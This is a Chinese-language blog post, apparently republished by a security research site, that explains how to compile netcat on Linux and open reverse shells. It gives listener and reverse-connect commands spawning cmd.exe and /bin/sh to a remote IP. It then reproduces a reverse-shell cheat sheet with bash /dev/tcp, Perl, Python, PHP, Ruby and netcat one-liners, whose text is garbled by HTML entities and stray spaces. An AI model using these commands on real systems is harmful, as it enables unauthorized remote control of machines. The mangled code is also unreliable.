linux下编译netcat并且反弹cmdshell

• 2012/10/21  作者: admin

linux下编译netcat并且反弹cmdshell

本地Windows监听

nc -vv -l -p 1234               

 

 首先从sf上get一个tar的压缩包

wget http://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz/download -O netcat-0.7.1.tar.gz

然后当然是解压了

tar zxvf netcat-0.7.1.tar.gz

 解压完毕之后会生成目录，要cd进去

cd netcat-0.7.1

然后进行编译前的配置。

./configure

 配置完了之后就可以make编译了。

 编译成功就生成了netcat可执行的文件了，位于src目录，cd进去进行运行./netcat -h.如图

本地Windows监听

nc -vv -l -p 1234                                                                               

 

 

远程Windows转发
nc -t -e C:WINDOWSsystem32cmd.exe 8.8.8.8 1234

 

远程Linux转发

./netcat  8.8.8.8  1234 -e /bin/sh

ReverseShell.c

ReverseShell.pl

ReverseShell.py

phpspy.php

 ———————NetCat for linux 参数e————————-

wget http://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz/download -O netcat-0.7.1.tar.gz

tar zxvf netcat-0.7.1.tar.gz

cd netcat-0.7.1

./configure

make

cd src

./netcat -h

——————————————————————–

一句话反弹命令

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

[Bash]

Default

1	bash - i & gt ; & amp ; / dev / tcp / 10.0.0.1 / 8080 0 & gt ; & amp ; 1

 

[PERL]

Default

1

perl - e ‘ use Socket ; $ i =” 10.0.0.1″ ; $ p = 1234 ; socket ( S , PF_INET , SOCK_STREAM , getprotobyname (“ tcp” ) ) ; if ( connect ( S , sockaddr_in ( $ p , inet_aton ( $ i ) ) ) ) { open ( STDIN ,” & gt ; & amp ; S” ) ; open ( STDOUT ,” & gt ; & amp ; S” ) ; open ( STDERR ,” & gt ; & amp ; S” ) ; exec (“ / bin / sh - i” ) ; } ;’

 

[Python]

Default

1

python - c ‘ import socket , subprocess , os ; s = socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) ; s . connect ( (“ 10.0.0.1″ , 1234 ) ) ; os . dup2 ( s . fileno ( ) , 0 ) ; os . dup2 ( s . fileno ( ) , 1 ) ; os . dup2 ( s . fileno ( ) , 2 ) ; p = subprocess . call ( [ "/bin/sh" , "-i" ] ) ;’

 

[PHP]

Default

1	php - r ‘ $ sock = fsockopen (“ 10.0.0.1″ , 1234 ) ; exec (“ / bin / sh - i & lt ; & amp ; 3 & gt ; & amp ; 3 2 & gt ; & amp ; 3″ ) ;’

 

[Ruby]

Default

1	ruby - rsocket - e’ f = TCPSocket . open (“ 10.0.0.1″ , 1234 ) . to_i ; exec sprintf (“ / bin / sh - i & lt ; & amp ; % d & gt ; & amp ; % d 2 & gt ; & amp ; % d” , f , f , f )’

 

[Netcat]

Default

1 2	nc - e / bin / sh 10.0.0.1 1234 rm / tmp / f ; mkfifo / tmp / f ; cat / tmp / f | / bin / sh - i 2 & gt ; & amp ; 1 | nc 10.0.0.1 1234 & gt ; / tmp / f

 

原文：http://blog.xxgo.org/technology/linuxbackshellwithnc.html

本文由 网络安全攻防研究室(www.91ri.org) 信息安全小组收集整理，转载请注明出处。